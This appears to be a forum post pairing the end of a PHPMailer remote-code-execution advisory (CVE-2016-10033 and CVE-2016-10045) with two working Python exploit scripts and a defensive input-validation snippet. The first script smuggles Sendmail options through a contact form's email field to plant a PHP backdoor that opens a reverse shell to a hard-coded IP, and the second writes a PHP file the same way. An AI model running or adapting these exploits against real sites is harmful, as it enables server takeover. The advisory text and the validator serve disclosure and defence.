RCE Exploit (CVE 2016-10033-10045 PHPMailer) Part 3-3

VII. SYSTEMS AFFECTED
-------------------------

All current versions of PHPMailer (< 5.2.20) are affected.

Note that exploitation is not limited to systems with Sendmail MTA.


VIII. SOLUTION
-------------------------

No official solution is available at the moment.

NOTE:
The vulnerability / patch bypass was responsibly reported to the vendor
in private on December 26th, and a new CVE was issued by MITRE on the same day.
However, a potential bypass was publicly discussed on the oss-sec list.
Holding the advisory further would serve no purpose, which is what triggered
the early release of this advisory.

The vendor has been working on a new patch since the private disclosure
on 26th December which should be published shortly.


IX. REFERENCES
-------------------------

https://legalhackers.com

This advisory (CVE-2016-10045):
https://legalhackers.com/advisories...de-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html

The original vuln of CVE-2016-10033:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10045/PHPMailer_RCE_exploit.py

Other exploits with other attack vectors will be disclosed at a later date to
allow more time for patching.

CVE-2016-10045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045

PHPMailer / Vendor security updates / notices:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md

http://php.net/manual/en/function.mail.php


PHPMailer 5.2.18 CVE 2016-10033 + Video
Code in Python


Code:
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMailer with back connection (reverse shell) from the target
Usage:
1 - Download docker vulnerable environment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
3 - Open nc listener in one terminal: $ nc -lnvp <your ip>
4 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
target = 'http://localhost:8080'
backdoor = '/backdoor.php'
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'message': 'Pwned'}
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)


PHPMailer 5.2.18 & 5.2.20 CVE 2016-10033 - CVE 2016-10045
Code in Python


Code:
#!/usr/bin/python
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
 Dawid Golunski
 @dawid_golunski
 https://legalhackers.com
"""
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib
import urllib2
import socket
import sys
RW_DIR = "/var/www/html/uploads"
url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php  some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php  some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
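
A defender-side check for the form handler, added here as an example (it is not code from the advisory, from either PoC script, or from the PHPMailer project): it accepts only sender addresses in a conservative unquoted form and flags the Sendmail option tokens (-X, -oQ, -OQueueDirectory) that the payloads in both scripts above rely on, so a web application can reject and log such submissions before the address ever reaches PHPMailer. Function names and the sample submissions are constructed for this example.

```python
import re

# Conservative sender-address form: dot-atom local part and a plain domain.
# It deliberately rejects RFC 5322 quoted local parts ("..."@host), whitespace,
# quotes and backslashes, which is the grammar the PoC payloads above use to
# smuggle Sendmail options through PHPMailer's address validation.
SAFE_ADDR = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Sendmail options seen in the PoC payloads on this page: -X (log file, used to
# write the PHP file into a web-reachable directory) and -oQ / -OQueueDirectory
# (queue directory). Only matched at the start of a whitespace-separated token.
SENDMAIL_OPT = re.compile(r"(?:^|\s)(-(?:X|oQ|OQueueDirectory)\S*)")


def is_safe_sender(addr: str) -> bool:
    """True only if addr is a plain, unquoted address in the allowed form."""
    return SAFE_ADDR.match(addr) is not None


def injection_indicators(value: str) -> list:
    """Return the Sendmail option tokens found in one form-field value."""
    return SENDMAIL_OPT.findall(value)


def triage_submission(fields: dict) -> dict:
    """Classify one contact-form submission (field name -> submitted value).

    Rejected if the sender address is outside the safe form or any field
    carries a Sendmail option token; indicators are returned for logging.
    """
    email_safe = is_safe_sender(fields.get("email", ""))
    hits = {k: injection_indicators(v) for k, v in fields.items()
            if injection_indicators(v)}
    return {"email_safe": email_safe, "indicators": hits,
            "reject": (not email_safe) or bool(hits)}


# Constructed sample submissions: a benign one, then the address shapes used
# by the CVE-2016-10033 PoC, the CVE-2016-10045 bypass and the first script.
SAMPLES = [
    {"name": "Jane", "email": "jane.doe@example.com", "msg": "hello"},
    {"name": "x", "msg": "<?php ... ?>",
     "email": '"attacker\\" -oQ/tmp/ -X/var/www/html/uploads/phpcode.php  some"@email.com'},
    {"name": "x", "msg": "<?php ... ?>",
     "email": '"attacker\\\' -oQ/tmp/ -X/var/www/html/uploads/phpcode.php  some"@email.com'},
    {"name": "x", "msg": "Pwned",
     "email": '"anarcoder\\" -OQueueDirectory=/tmp -X/www/backdoor.php server" @protonmail.com'},
]
```

Note that legitimate RFC 5322 quoted local parts are rejected too; that trade-off is the point, since the form only needs to accept ordinary addresses.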


I hope it helps. A greeting to all the brothers of this community :)